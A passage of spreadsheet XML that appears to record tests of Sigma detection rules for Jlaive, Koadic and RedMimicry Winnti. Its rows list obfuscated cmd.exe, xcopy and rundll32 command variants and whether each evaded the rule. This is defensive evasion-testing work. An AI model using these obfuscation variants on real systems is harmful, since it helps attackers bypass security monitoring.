          <t>cmd.exe -"c" script.bat &amp;&amp; copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\script.bat.exe</t>
        </is>
      </c>
      <c r="F2455" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2455" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2455" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2455" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2455" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2455" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2456" ht="15.75" customHeight="1" s="42">
      <c r="A2456" s="43" t="n"/>
      <c r="B2456" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2456" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2456" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2456" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" script.cmd &amp;&amp; xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\hidden.cmd.exe*</t>
        </is>
      </c>
      <c r="F2456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2456" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2456" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2456" s="44" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2456" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2456" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2457" ht="15.75" customHeight="1" s="42">
      <c r="A2457" s="43" t="n"/>
      <c r="B2457" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_jlaive_batch_execution</t>
        </is>
      </c>
      <c r="C2457" s="44" t="inlineStr">
        <is>
          <t>HackTool - Jlaive In-Memory Assembly Execution</t>
        </is>
      </c>
      <c r="D2457" s="44" t="inlineStr">
        <is>
          <t>0a99eb3e-1617-41bd-b095-13dc767f3def</t>
        </is>
      </c>
      <c r="E2457" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /"c" script.cmd &amp;&amp; xcopy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Temp\hidden.cmd.exe*</t>
        </is>
      </c>
      <c r="F2457" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2457" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2457" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I2457" s="43" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J2457" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2457" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2458" ht="15.75" customHeight="1" s="42">
      <c r="A2458" s="43" t="n"/>
      <c r="B2458" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2458" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2458" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2458" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2458" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2458" s="43" t="n"/>
      <c r="J2458" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2458" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2459" ht="15.75" customHeight="1" s="42">
      <c r="A2459" s="43" t="n"/>
      <c r="B2459" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2459" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2459" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2459" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2459" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2459" s="43" t="n"/>
      <c r="J2459" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2459" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2460" ht="15.75" customHeight="1" s="42">
      <c r="A2460" s="43" t="n"/>
      <c r="B2460" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2460" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2460" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2460" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"^q" /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2460" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2460" s="44" t="n"/>
      <c r="J2460" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2460" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2461" ht="15.75" customHeight="1" s="42">
      <c r="A2461" s="43" t="n"/>
      <c r="B2461" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2461" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2461" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2461" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2461" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2461" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2461" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2461" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2461" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2462" ht="15.75" customHeight="1" s="42">
      <c r="A2462" s="43" t="n"/>
      <c r="B2462" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2462" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2462" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2462" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^C c^hcp 437</t>
        </is>
      </c>
      <c r="F2462" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2462" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2462" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2462" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2462" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2463" ht="15.75" customHeight="1" s="42">
      <c r="A2463" s="43" t="n"/>
      <c r="B2463" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2463" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2463" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2463" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^Q /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2463" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2463" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2463" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2463" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2463" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2464" ht="15.75" customHeight="1" s="42">
      <c r="A2464" s="43" t="n"/>
      <c r="B2464" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2464" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2464" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2464" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q -"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2464" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2464" s="43" t="n"/>
      <c r="J2464" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2464" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2465" ht="15.75" customHeight="1" s="42">
      <c r="A2465" s="43" t="n"/>
      <c r="B2465" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2465" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2465" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2465" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /^q /"^c" c^hcp 437</t>
        </is>
      </c>
      <c r="F2465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2465" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2465" s="43" t="n"/>
      <c r="J2465" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2465" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2466" ht="15.75" customHeight="1" s="42">
      <c r="A2466" s="43" t="n"/>
      <c r="B2466" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2466" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2466" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2466" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"^q" /^c c^hcp 437</t>
        </is>
      </c>
      <c r="F2466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2466" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2466" s="44" t="n"/>
      <c r="J2466" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2466" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2467" ht="15.75" customHeight="1" s="42">
      <c r="A2467" s="43" t="n"/>
      <c r="B2467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2467" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2467" s="43" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2467" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2467" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G2467" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H2467" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I2467" s="43" t="n"/>
      <c r="J2467" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K2467" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2468" ht="15.75" customHeight="1" s="42">
      <c r="A2468" s="44" t="n"/>
      <c r="B2468" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2468" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2468" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2468" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" "ch" "cp" 1252</t>
        </is>
      </c>
      <c r="F2468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2468" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2468" s="43" t="n"/>
      <c r="J2468" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2468" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2469" ht="15.75" customHeight="1" s="42">
      <c r="A2469" s="44" t="n"/>
      <c r="B2469" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2469" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2469" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2469" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2469" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2469" s="43" t="n"/>
      <c r="J2469" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2469" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2470" ht="15.75" customHeight="1" s="42">
      <c r="A2470" s="44" t="n"/>
      <c r="B2470" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2470" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2470" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2470" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /Q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2470" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2470" s="43" t="n"/>
      <c r="J2470" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2470" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2471" ht="15.75" customHeight="1" s="42">
      <c r="A2471" s="44" t="n"/>
      <c r="B2471" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2471" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2471" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2471" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q /C c^hcp 1252</t>
        </is>
      </c>
      <c r="F2471" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2471" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2471" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2471" s="43" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2471" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2471" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2472" ht="15.75" customHeight="1" s="42">
      <c r="A2472" s="44" t="n"/>
      <c r="B2472" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2472" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2472" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2472" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"q" /"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2472" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2472" s="44" t="n"/>
      <c r="J2472" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2472" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2473" ht="15.75" customHeight="1" s="42">
      <c r="A2473" s="44" t="n"/>
      <c r="B2473" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2473" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2473" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2473" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"q" /c c^hcp 1252</t>
        </is>
      </c>
      <c r="F2473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2473" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2473" s="44" t="n"/>
      <c r="J2473" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2473" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2474" ht="15.75" customHeight="1" s="42">
      <c r="A2474" s="44" t="n"/>
      <c r="B2474" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2474" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2474" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2474" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /q -"c" c^hcp 1252</t>
        </is>
      </c>
      <c r="F2474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2474" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2474" s="44" t="n"/>
      <c r="J2474" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2474" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2475" ht="15.75" customHeight="1" s="42">
      <c r="A2475" s="44" t="n"/>
      <c r="B2475" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2475" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2475" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2475" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2475" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2475" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2475" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2475" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2475" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2476" ht="15.75" customHeight="1" s="42">
      <c r="A2476" s="44" t="n"/>
      <c r="B2476" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2476" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2476" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2476" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2476" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2476" s="44" t="n"/>
      <c r="J2476" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2476" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2477" ht="15.75" customHeight="1" s="42">
      <c r="A2477" s="44" t="n"/>
      <c r="B2477" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2477" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2477" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2477" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /"q" -"c" %x% 1252</t>
        </is>
      </c>
      <c r="F2477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2477" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2477" s="44" t="n"/>
      <c r="J2477" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2477" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2478" ht="15.75" customHeight="1" s="42">
      <c r="A2478" s="44" t="n"/>
      <c r="B2478" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2478" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2478" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2478" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe /Q /c %x% 1252</t>
        </is>
      </c>
      <c r="F2478" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2478" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2478" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution (5cddf373-ef00-4112-ad72-960ac29bac34)</t>
        </is>
      </c>
      <c r="J2478" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2478" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2479" ht="15.75" customHeight="1" s="42">
      <c r="A2479" s="44" t="n"/>
      <c r="B2479" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2479" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2479" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2479" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /C %x% 1252</t>
        </is>
      </c>
      <c r="F2479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2479" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2479" s="43" t="n"/>
      <c r="J2479" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2479" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2480" ht="15.75" customHeight="1" s="42">
      <c r="A2480" s="44" t="n"/>
      <c r="B2480" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_koadic</t>
        </is>
      </c>
      <c r="C2480" s="44" t="inlineStr">
        <is>
          <t>HackTool - Koadic Execution</t>
        </is>
      </c>
      <c r="D2480" s="44" t="inlineStr">
        <is>
          <t>5cddf373-ef00-4112-ad72-960ac29bac34</t>
        </is>
      </c>
      <c r="E2480" s="44" t="inlineStr">
        <is>
          <t>set x=chcp &amp;&amp; cmd.exe -"q" /c %x% 1252</t>
        </is>
      </c>
      <c r="F2480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2480" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2480" s="43" t="n"/>
      <c r="J2480" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2480" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2481" ht="15.75" customHeight="1" s="42">
      <c r="A2481" s="44" t="n"/>
      <c r="B2481" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2481" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2481" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2481" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\temp\custom_module.dll,Main</t>
        </is>
      </c>
      <c r="F2481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2481" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2481" s="44" t="n"/>
      <c r="J2481" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2481" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2482" ht="15.75" customHeight="1" s="42">
      <c r="A2482" s="44" t="n"/>
      <c r="B2482" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2482" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2482" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2482" s="44" t="inlineStr">
        <is>
          <t>rundll32.exe C:\Windows\Temp\renamed_payload.dll,DllMain</t>
        </is>
      </c>
      <c r="F2482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H2482" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I2482" s="44" t="n"/>
      <c r="J2482" s="44" t="n">
        <v>1</v>
      </c>
      <c r="K2482" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="2483" ht="15.75" customHeight="1" s="42">
      <c r="A2483" s="43" t="n"/>
      <c r="B2483" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2483" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2483" s="44" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E2483" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" C:\Windows\Temp\t^m^p.bat</t>
        </is>
      </c>
      <c r="F2483" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G2483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="H2483" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I2483" s="43" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution (95022b85-ff2a-49fa-939a-d7b8f56eeb9b)</t>
        </is>
      </c>
      <c r="J2483" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K2483" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="2484" ht="15.75" customHeight="1" s="42">
      <c r="A2484" s="43" t="n"/>
      <c r="B2484" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C2484" s="44" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D2484" s="44" t="inlineStr">
        <is>
